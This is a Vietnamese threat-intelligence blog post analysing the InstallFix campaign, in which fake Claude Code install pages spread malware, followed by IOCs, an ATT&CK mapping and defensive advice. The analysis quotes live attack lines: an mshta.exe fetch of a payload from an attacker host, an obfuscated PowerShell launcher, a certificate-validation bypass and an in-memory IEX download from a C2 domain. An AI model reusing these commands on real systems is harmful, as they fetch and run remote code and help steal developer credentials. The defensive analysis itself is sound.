Skip to main content
HashnodeFPT IS SecurityFPT IS Security

Command Palette

Search for a command to run...

Bạn đang cài AI tool… hay tự tay mở cửa cho hacker?

Published
11 min read
Bạn đang cài AI tool… hay tự tay mở cửa cho hacker?
L
Lưu Tuấn Anh

Tóm tắt chiến dịch

InstallFix là chiến dịch malware/social engineering được phát hiện trong đầu năm 2026, nhắm trực tiếp vào cộng đồng developer và AI engineer thông qua việc giả mạo trình cài đặt của Claude Code — một AI coding tool phổ biến.

Khác với các chiến dịch phishing truyền thống sử dụng email hoặc attachment độc hại, InstallFix tận dụng: Google Ads, SEO poisoning, Fake installer websites, One-line terminal commands để dụ nạn nhân tự thực thi malware trên máy của mình.

Chiến dịch được đánh giá nguy hiểm bởi tỷ lệ thành công cao, gần như không cần exploit kỹ thuật và đặc biệt nhắm vào nhóm người dùng có đặc quyền cao (developer/devops).

Vì sao AI tool đang trở thành mục tiêu hấp dẫn cho attacker?

Timeline sự kiện

Thời gian Sự kiện
Q1/2026 Attacker dựng fake website giả mạo Claude Code và mua Google Ads để đẩy kết quả tìm kiếm độc hại lên đầu.
T0 Người dùng tìm kiếm “Claude Code install” và truy cập nhầm website giả mạo.
T0 + vài phút Nạn nhân copy-paste lệnh cài đặt độc hại vào terminal/PowerShell.
T0 + 1 phút Payload stage-1 được thực thi, tải thêm malware thông qua PowerShell hoặc mshta.exe.
T0 + 5 phút Malware tạo persistence và bắt đầu đánh cắp GitHub token, SSH key, browser cookies và cloud credentials.
T0 + 10 phút Thiết bị kết nối tới C2 server để nhận thêm payload và lệnh điều khiển.
T0 + vài giờ Researcher phát hiện hạ tầng giả mạo và hành vi malware bất thường.

Lây nhiễm ban đầu

Chiến dịch InstallFix được phát tán chủ yếu thông qua Google Ads bằng cách lợi dụng các kết quả tìm kiếm được tài trợ (Sponsored Results). Khi người dùng tìm kiếm các từ khóa như “Claude Code” hoặc “Claude Code install”, website giả mạo sẽ xuất hiện ngay ở vị trí đầu tiên trên Google Search, khiến nhiều nạn nhân tin rằng đây là trang chính thức.

Trang giả mạo này được thiết kế rất tinh vi, mô phỏng gần như toàn bộ giao diện và workflow cài đặt của website thật. Điểm nguy hiểm nhất nằm ở phần install command được hiển thị trên trang. Thay vì lệnh cài đặt hợp lệ, attacker đã thay thế bằng command độc hại sử dụng PowerShell và mshta.exe nhằm tải và thực thi malware trên hệ thống Windows. Với người dùng macOS, website cũng hiển thị các command độc hại tương tự nhằm triển khai payload trên thiết bị Apple.

Ngoài ra, URL quảng cáo độc hại còn được thiết kế để trông giống liên kết hợp pháp của Google Ads. Các tham số như gar_sourcegad_campaign được thêm vào nhằm mô phỏng cấu trúc tracking thường thấy trong các chiến dịch quảng cáo Google, giúp tăng độ tin cậy và giảm khả năng bị nghi ngờ bởi người dùng.

Chuỗi tấn công

Giai đoạn 1 — Initial Access qua Google Ads Malvertising

Chiến dịch InstallFix bắt đầu bằng việc attacker mua quảng cáo Google Ads để chiếm vị trí đầu trong kết quả tìm kiếm với các từ khóa như “Claude Code” hoặc “Claude Code install”. Khi người dùng tìm kiếm công cụ AI này, kết quả được tài trợ (Sponsored Result) sẽ dẫn tới một website giả mạo có giao diện gần như giống hoàn toàn trang cài đặt chính thức của Claude Code.

Website giả được thiết kế rất tinh vi với hướng dẫn cài đặt riêng cho từng hệ điều hành như Windows và macOS. Thay vì cung cấp file cài đặt hợp pháp, trang web hiển thị một command độc hại và yêu cầu người dùng copy-paste vào terminal hoặc PowerShell để “hoàn tất cài đặt”.

Đây là biến thể của kỹ thuật ClickFix social engineering — attacker không khai thác lỗ hổng kỹ thuật mà khiến nạn nhân tự thực thi payload trên máy của mình. Trên Windows, command này sẽ kích hoạt mshta.exe để tải payload từ remote server.

Giai đoạn 2 — MSHTA tải và thực thi file Polyglot ZIP/HTA

Sau khi người dùng chạy command từ website giả, tiến trình PowerShell sẽ gọi: mshta.exe https://download-version.1-5-8[.]com/claude.msixbundle và Payload được tải về có claude.msixbundle.

Bề ngoài đây giống một package cài đặt Microsoft hợp lệ, tuy nhiên thực tế file này là một ZIP/HTA polyglot — nghĩa là một file chứa đồng thời: archive ZIP hợp lệ và một HTA payload độc hại được append ở cuối file.

Phần đầu của file chứa các package Microsoft Bing có chữ ký số hợp lệ từ Microsoft Marketplace nhằm tăng độ tin cậy nếu bị kiểm tra sơ bộ. Tuy nhiên, mshta.exe sẽ bỏ qua phần ZIP và trực tiếp đọc phần HTA được nhúng ở cuối file để thực thi mã độc.

Kỹ thuật polyglot này giúp attacker:

  • Bypass kiểm tra đơn giản

  • Khiến file trông hợp pháp

  • Né một số cơ chế detection dựa trên extension hoặc magic bytes

Giai đoạn 3 — HTA VBScript thực thi âm thầm thông qua COM

Sau khi mshta.exe chạy payload, phần HTA sẽ kích hoạt VBScript bên trong một cách hoàn toàn ẩn khỏi người dùng. Script sử dụng: Shell.Application thông qua COM object: GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4 để launch payload tiếp theo.

Để né detection, attacker sử dụng nhiều lớp obfuscation:

  • Hex encoding

  • Base64 encoding

  • Split string reconstruction

Hai function chính được dùng:

  • DisplayEmailGnu() để giải mã chuỗi hex

  • GetBiosDebian() để giải mã Base64 command

Sau khi decode hoàn tất, VBScript sẽ thực thi command: cmd.exe /v:on /c "set x=pow&&set y=ershell&&call %windir%\SysWOW64\WindowsPowerShell\v1.0!x!!y! -E " nhằm gọi Windows PowerShell từ cmd.exe để thực hiện cho chuỗi tấn công tiếp theo.

Giai đoạn 4 — PowerShell Stager và AMSI Bypass

Sau khi command được reconstruct, malware gọi phiên bản PowerShell 32-bit trong: SysWOW64\WindowsPowerShell\v1.0\ và thực thi payload Base64 thông qua tham số: -E. PowerShell stager này thực hiện nhiều bước quan trọng:

Victim Fingerprinting

  • Tại đây Malware tạo ID riêng cho từng nạn nhân bằng cách hash: COMPUTERNAME + USERNAME, sử dụng MD5 rồi lấy 16 ký tự đầu tiên làm victim token.

  • Điều này cho phép attacker:

    • tracking từng nạn nhân riêng biệt

    • tạo URL C2 unique cho mỗi máy

    • khó block ở mức network

SSL Validation Bypass

  • Malware vô hiệu hóa certificate validation: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} để chấp nhận mọi HTTPS certificate kể cả self-signed hoặc malicious cert.

AMSI Bypass

  • Một trong những kỹ thuật nguy hiểm nhất là patch AMSI (Antimalware Scan Interface). Payload:

    • RC4 decrypt các chuỗi obfuscation

    • sử dụng key:

  • Kết quả:

    • PowerShell session gần như “mù” với AMSI

    • AV/EDR khó scan các payload tiếp theo

Fileless Payload Execution

  • Sau khi bypass AMSI thành công, malware tải stage cuối từ C2: https://[victim-id].oakenfjrod[.]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1

  • Payload được thực thi trực tiếp trong memory bằng: IEX mà không cần ghi file xuống disk. Đây là kỹ thuật fileless execution rất phổ biến trong malware hiện đại nhằm:

    • Né antivirus

    • Giảm forensic artifacts

    • Khó phân tích hơn

Giai đoạn 5 — Final Payload

Payload cuối cùng chưa được recovery hoàn chỉnh do Trend Micro Apex One đã terminate chuỗi tiến trình ở giai đoạn trước khi IEX hoàn tất.

Tuy nhiên, telemetry cho thấy malware đã cố tải payload từ: https://[victim-id].oakenfjrod[.]ru/

Do payload được thực thi fileless và bị chặn sớm, chức năng cuối cùng chưa được xác định hoàn toàn. Tuy nhiên dựa trên TTPs và hành vi observed, nhiều khả năng đây là:

  • infostealer

  • remote access payload

  • credential harvester

  • secondary loader cho malware khác.

InstallFix là sự tiến hóa của ClickFix

Nhiều researcher xem InstallFix là phiên bản mới của kỹ thuật: ClickFix

Khác biệt nằm ở chỗ:

  • ClickFix lừa user click

  • InstallFix lừa user tự chạy command

Tâm lý “tự tay chạy lệnh” khiến:

  • nạn nhân ít nghi ngờ hơn

  • nhiều security policy bị bypass tự nhiên

IOC

Domains

  • download-version[.]1-5-8[.]com

  • hosted-by[.]yeezyhost[.]net

  • oakenfjrod[.]ru

URL

  • hxxps://download-version[.]1-5-8[.]com/claude[.]msixbundle

  • hxxps://<victim_md5>.oakenfjrod[.]ru/cloude-91267b64-989f-49b4-89b4-984e0154d4d1

IP

  • 185[.]177[.]239[.]255

  • 77[.]91[.]97[.]244

  • 104[.]21[.]0[.]95

Hashes

  • 2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97

  • ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772

  • 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74

MITRE ATT&CK Mapping

Tactic Technique Description
Initial Access T1566 Phishing
Execution T1059.001 PowerShell
Defense Evasion T1218 Signed Binary Proxy Execution
Persistence T1547 Startup Persistence
Credential Access T1555 Browser Credentials
Discovery T1082 System Information Discovery
Command & Control T1071.001 Web Protocols
Exfiltration T1041 Exfiltration Over C2

Nhận định chuyên gia

InstallFix cho thấy attacker hiện nay không còn phụ thuộc hoàn toàn vào exploit kỹ thuật mà chuyển sang khai thác trực tiếp hành vi người dùng. Thay vì phát tán malware qua email phishing truyền thống, chiến dịch này lợi dụng thói quen copy-paste lệnh cài đặt của developer để đạt initial access.

Điểm đáng chú ý là mục tiêu không phải người dùng phổ thông mà là developer và AI engineer — những người thường sở hữu GitHub token, SSH key, cloud credentials và quyền truy cập hạ tầng quan trọng. Điều này khiến một compromise nhỏ hoàn toàn có thể leo thang thành supply-chain attack quy mô lớn.

Chiến dịch cũng phản ánh xu hướng mới khi AI ecosystem đang dần trở thành attack surface hấp dẫn cho cybercriminals. Với sự phổ biến của AI coding tools, các chiến dịch giả mạo installer, package hoặc extension nhiều khả năng sẽ còn gia tăng trong thời gian tới.

Đối với doanh nghiệp tại Việt Nam, nguy cơ đặc biệt cao ở các công ty công nghệ, outsourcing, fintech và AI startup — nơi developer thường sử dụng local admin workstation và cloud credential trên máy cá nhân. InstallFix là lời cảnh báo rõ ràng rằng bảo mật cho AI tooling giờ đây đã trở thành yêu cầu bắt buộc, không còn là lựa chọn.

Khuyến nghị

Không cài phần mềm từ Google Ads

Nhiều nạn nhân bị lừa vì click vào kết quả “Sponsored” trên Google Search. Attacker chỉ cần mua quảng cáo và clone giao diện website chính thức là có thể đánh lừa người dùng.

Thay vì tìm kiếm ngẫu nhiên:

  • hãy bookmark website chính thức

  • truy cập trực tiếp từ vendor

  • verify kỹ domain trước khi tải

Hạn chế tối đa việc dùng curl | bash

  • tải script về trước

  • đọc nội dung script

  • kiểm tra domain và checksum

  • ưu tiên package manager chính thức như:

    • Homebrew

    • apt

    • winget

    • npm registry verified

Không chạy terminal bằng quyền Administrator/root nếu không cần

Nhiều malware chỉ hoạt động nguy hiểm khi user chạy terminal với quyền cao.

Hạn chế:

  • dùng sudo mặc định

  • mở PowerShell Administrator thường xuyên

  • cấp quyền root cho tool không rõ nguồn gốc

Bảo vệ credential developer

  • dùng MFA cho tất cả tài khoản

  • rotate token định kỳ

  • không lưu secret plaintext

  • dùng password manager

  • ưu tiên hardware security key (YubiKey/FIDO2)

Tách môi trường development và tài khoản cá nhân

Không nên:

  • dùng cùng browser cho công việc và cá nhân

  • lưu cloud credential trên máy cá nhân không được hardening

  • develop trực tiếp trên máy có dữ liệu quan trọng

Nên:

  • dùng VM/dev container

  • dùng browser profile riêng

  • sandbox AI tools chưa tin cậy

Cập nhật nhận thức về AI-related threats

AI ecosystem đang trở thành mục tiêu mới của attacker. Trong thời gian tới, các chiến dịch tương tự nhiều khả năng sẽ mở rộng sang:

  • AI IDE plugins

  • MCP servers

  • AI agents

  • VSCode extensions

  • fake npm/pypi packages

Tham khảo

InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Trend Micro (US)

InstallFix Uses Fake Claude Pages for Fileless Attacks

#claude-code#installfix#ai-coding-tools#google-ads#vbscript

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

F

FPT IS Security

777 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.